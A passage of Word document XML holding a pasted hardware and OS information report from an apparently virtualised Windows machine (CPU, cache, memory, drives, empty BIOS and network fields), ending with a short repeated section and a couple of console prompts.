        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Architechture = X64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095DF991" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Endianess = LITTLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753BD6B6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Frequency = 100.00 GHZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A8F650" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Vendor Name = GenuineIntel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FE07A5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Vendor ID = Intel64 Family 6 Model 6 Stepping 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537821B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Model Name = QEMU Virtual CPU version 2.5+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1CB49" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Counts Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D081A4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Number of Hyperthread Cores = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A4D6B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Number of Cores = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1948B75F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Number of Units = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AF8584" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Counts Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A1CFCE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Cache Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FADC3D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Cache Type = UNIFIED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683DE252" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Cache Size = 4 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292042E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Line Size = 64 Bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B2521B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Associativity = 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3504C1A2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Cache Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128525F1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Supported Instruction Sets List --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190D49F9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Instruction Set = X87_FPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDB8A82" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Instruction Set = BMI1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5D67C7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>-- End Supported Instruction Sets List --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C63333B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------------ END CPU INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B13487" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D38ED91" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFEBB4D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------------ BEGIN GPU INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36645AE8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Device List --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43003944" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Found 0 GPU devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1CE60" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Device List --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C772F90" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------------ END GPU INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7368765C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09919977" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B92F64" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------------ BEGIN MEMORY INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285BDBE8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Physical Memory (24.74 GB /28.00 GB) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67101F2E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Virtual Memory (131070.29 GB, 131072.00 GB) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708927FC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin All Drives Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CFED8D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> - Number of Logical Drives = 2 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD90F91" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Drive Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1137033F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Letter = C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06844C00" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Volume Name = "UNKNOWN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6453C0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Type = FIXED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEDA59F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Size =  255.51 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF7996E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Available Free =  213.45 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C5F48B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Total Free =  213.45 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40433B68" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Drive Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4AE67C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Drive Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A791DDB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Letter = D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237B294F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Volume Name = "Data"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC91DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Type = FIXED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA4C723" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Size =  3583.87 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58789395" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Available Free =  3547.59 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C29D5D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Total Free =  3547.59 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591BB148" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Drive Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166CEF5A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End All Drives Info --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C26FB27" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------------ END MEMORY INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7DEE7F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30334432" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39CC05A3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------------ BEGIN OS INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6300FF07" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin BIOS Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38448DF4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39069E63" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Description = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF70026" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Version = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD96E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End BIOS Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45223737" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin MotherBoard Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAD0E06" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FFDC3D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Description = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B0E4C1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Revision Number = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14449CBA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End MotherBoard Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273D5287" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Owner Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7693DF67" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Primary Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE74DF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Primary Contact = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54064BA1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Owner Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1090374F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Date/Time Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A680AF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Current Time Zone = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A368C8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Daylight Savings in Effect = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF784C4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Enable Daylight Savings = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAD3150" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Date/Time Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4549A94C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Network Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F09D47" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - User Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE905F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - DNS Host Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118575B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Workgroup Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4801A1DB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Domain Name = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AB2721" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Domain Role = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E08C4ED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Network Server Mode Enabled = FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51778AD2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Roles = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72157925" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Network Information --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD57EFF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- Begin Network Profiles --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6575CE88" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  - Found 0 profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738125B3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Network Profiles --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C902C41" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------------ END OS INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FE8692" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C7D310F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>n Network Profiles --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CFD1C4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Found 0 profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AEF0FF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-- End Network Profiles --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4660213B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>------------ END OS INFORMATION ------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E7AFEB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0354C243" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>13:56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD296D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>W1&gt;main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1B376E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
